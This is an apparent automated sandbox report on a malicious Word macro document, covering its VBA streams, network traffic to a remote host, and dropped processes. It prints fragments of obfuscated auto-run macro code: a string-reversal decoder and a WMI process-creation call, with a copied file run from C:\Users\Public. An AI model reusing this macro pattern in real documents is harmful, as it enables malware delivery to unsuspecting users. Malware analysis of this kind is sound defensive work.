Stream Path: PROJECTwm, File Type: data, Stream Size: 179 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 179 |
Entropy: | 3.66892704793 |
Base64 Encoded: | True |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a H 8 x m s . a . H . 8 . x . m . s . . . a R Z c b w . a . R . Z . c . b . w . . . a b h 0 R g . a . b . h . 0 . R . g . . . a 7 A 5 m . a . 7 . A . 5 . m . . . a d G b P A . a . d . G . b . P . A . . . a I s b 7 . a . I . s . b . 7 . . . a O M v 0 . a . O . M . v . 0 . . . . . |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4172 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4172 |
Entropy: | 4.76403916663 |
Base64 Encoded: | True |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2119 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2119 |
Entropy: | 3.47748136877 |
Base64 Encoded: | True |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 230 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 230 |
Entropy: | 1.75961915218 |
Base64 Encoded: | False |
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 348 |
Entropy: | 1.78450864632 |
Base64 Encoded: | False |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 106 |
Entropy: | 1.35911194617 |
Base64 Encoded: | False |
Stream Path: VBA/dir, File Type: data, Stream Size: 775 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 775 |
Entropy: | 6.59935768005 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . . |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 3, 2020 10:12:14.717160940 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:14.744054079 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:14.744210958 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:14.774555922 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:14.801323891 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:15.259387970 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:15.259423018 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:15.259588957 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:19.342504025 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 3, 2020 10:12:04.872263908 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:04.899449110 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:05.977966070 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:06.005306005 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:07.103354931 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:07.139152050 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:09.160564899 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:09.187803984 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:10.486977100 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:10.514538050 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:11.725595951 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:11.763911009 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:12.123970032 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:12.181309938 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:13.119251966 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:13.154472113 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:14.142292023 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:14.185724974 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:14.652942896 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:14.693248034 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:16.145160913 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:16.182802916 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:20.156338930 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:20.191992044 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:35.233314991 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:35.260240078 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:35.375446081 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:35.411010981 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:40.677835941 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:40.704961061 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:41.510663986 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:41.537661076 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:42.374233961 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:42.401274920 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:43.279664993 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:43.315388918 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:44.258956909 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:44.285885096 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:46.834990025 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:46.862232924 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:48.029016018 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:48.055943966 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:48.889570951 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:48.916682005 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:49.686250925 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:49.713371992 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:54.746095896 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:54.773276091 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:55.001687050 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:55.045443058 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:10.023046017 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:10.050081968 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:15.319488049 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:15.356364965 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:45.000901937 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:45.027858973 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:46.729356050 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:46.756539106 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Dec 3, 2020 10:12:14.652942896 CET | 192.168.2.3 | 8.8.8.8 | 0xb1c0 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Dec 3, 2020 10:12:14.693248034 CET | 8.8.8.8 | 192.168.2.3 | 0xb1c0 | No error (0) | 104.28.6.227 | A (IP address) | IN (0x0001) | ||
Dec 3, 2020 10:12:14.693248034 CET | 8.8.8.8 | 192.168.2.3 | 0xb1c0 | No error (0) | 104.28.7.227 | A (IP address) | IN (0x0001) | ||
Dec 3, 2020 10:12:14.693248034 CET | 8.8.8.8 | 192.168.2.3 | 0xb1c0 | No error (0) | 172.67.164.220 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49711 | 104.28.6.227 | 80 | C:\Users\Public\ms.com |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 3, 2020 10:12:14.774555922 CET | 222 | OUT | |
Dec 3, 2020 10:12:15.259387970 CET | 223 | IN | |
Dec 3, 2020 10:12:15.259423018 CET | 223 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 10:12:10 |
Start date: | 03/12/2020 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1270000 |
File size: | 1937688 bytes |
MD5 hash: | 0B9AB9B9C4DE429473D6450D4297A123 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 10:12:13 |
Start date: | 03/12/2020 |
Path: | C:\Users\Public\ms.com |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb30000 |
File size: | 13312 bytes |
MD5 hash: | 7083239CE743FDB68DFC933B7308E80A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
Reputation: | moderate |
General |
---|
Start time: | 10:12:15 |
Start date: | 03/12/2020 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
Module: a7A5m |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "a7A5m" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ | |
Part of subcall function aSGxU@a7A5m: Len | |
Part of subcall function aSGxU@a7A5m: Mid | |
a3IdJQ | |
create | SWbemObjectEx.create( |
Line | Instruction | Meta Information |
---|---|---|
42 | Sub awAlq() | |
47 | aYKyQ | executed |
52 | axIuO | |
65 | agPh8 = akSqK(aSGxU(a3IdJQ)) | a3IdJQ |
66 | CreateObject(agPh8).create (axSiN) | SWbemObjectEx.create( |
67 | End Sub |
APIs | Meta Information |
---|---|
Replace | Replace( |
a7odJ |
Strings | Decrypted Strings |
---|---|
"""" |
Line | Instruction | Meta Information |
---|---|---|
39 | Public Function akSqK(aPENSZ) | |
40 | akSqK = Replace(aPENSZ, a7odJ, "") | Replace( a7odJ executed |
41 | End Function |
APIs | Meta Information |
---|---|
Len | Len( |
Mid |
Line | Instruction | Meta Information |
---|---|---|
2 | Function aSGxU(aie8CL) | |
33 | For a6mGn = Len(aie8CL) To 1 Step - 1 | Len( |
34 | azUoN = Mid(aie8CL, a6mGn, 1) | Mid |
35 | adHaPl = adHaPl & azUoN | |
36 | Next | Len( |
37 | aSGxU = adHaPl | |
38 | End Function |
Module: aH8xms |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "aH8xms" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function awAlq@a7A5m: a3IdJQ | |
Part of subcall function awAlq@a7A5m: create |
Line | Instruction | Meta Information |
---|---|---|
2 | Sub AutoOpen() | |
3 | awAlq | executed |
4 | End Sub |
Module: aIsb7 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "aIsb7" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ |
Line | Instruction | Meta Information |
---|---|---|
2 | Function aCqnt(ayM1o) | |
6 | aCqnt = akSqK(ayM1o) | executed |
7 | End Function |
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ |
Line | Instruction | Meta Information |
---|---|---|
8 | Function aMslO(aucpr) | |
13 | aMslO = (akSqK(aucpr)) | executed |
14 | End Function |
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ |
Line | Instruction | Meta Information |
---|---|---|
15 | Function ayUxA2(aT2PX) | |
20 | ayUxA2 = (akSqK(aT2PX)) | executed |
21 | End Function |
APIs | Meta Information |
---|---|
Part of subcall function amZcqK@abh0Rg: FileCopy |
Line | Instruction | Meta Information |
---|---|---|
27 | Sub aVzRp() | |
28 | acIr6u = aCqnt(adkJvD(0)) | executed |
29 | adeKx = aMslO(adkJvD(1)) | |
30 | amZcqK acIr6u, adeKx | |
31 | End Sub |
APIs | Meta Information |
---|---|
Chr |
Line | Instruction | Meta Information |
---|---|---|
62 | Function a9vceZ(a48o6) | |
63 | a9vceZ = Chr(a48o6) | Chr executed |
64 | End Function |
Line | Instruction | Meta Information |
---|---|---|
35 | Function a3eJx(aFP9Ao) | |
36 | If aFP9Ao = 0 Then | executed |
37 | a3eJx = - 6824 + 6825 | |
53 | Elseif aFP9Ao = 5 Then | |
54 | a3eJx = - 63 + 160 | |
55 | Else | |
56 | a3eJx = 1049 - 25 | |
57 | Endif | |
58 | End Function |
Line | Instruction | Meta Information |
---|---|---|
22 | Function axSiN() | |
23 | adeKx = aMslO(adkJvD(1)) | executed |
24 | aaqRT = ayUxA2(adkJvD(2)) | |
25 | axSiN = adeKx & " " & aaqRT | |
26 | End Function |
Line | Instruction | Meta Information |
---|---|---|
32 | Function a3ox6(a48o6) | |
33 | a3ox6 = a48o6 + - 158 + 184 | executed |
34 | End Function |
Line | Instruction | Meta Information |
---|---|---|
59 | Function aYzBn(a48o6, a20NB) | |
60 | aYzBn = a48o6 - a20NB | executed |
61 | End Function |
Module: aOMv0 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "aOMv0" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Len | Len( |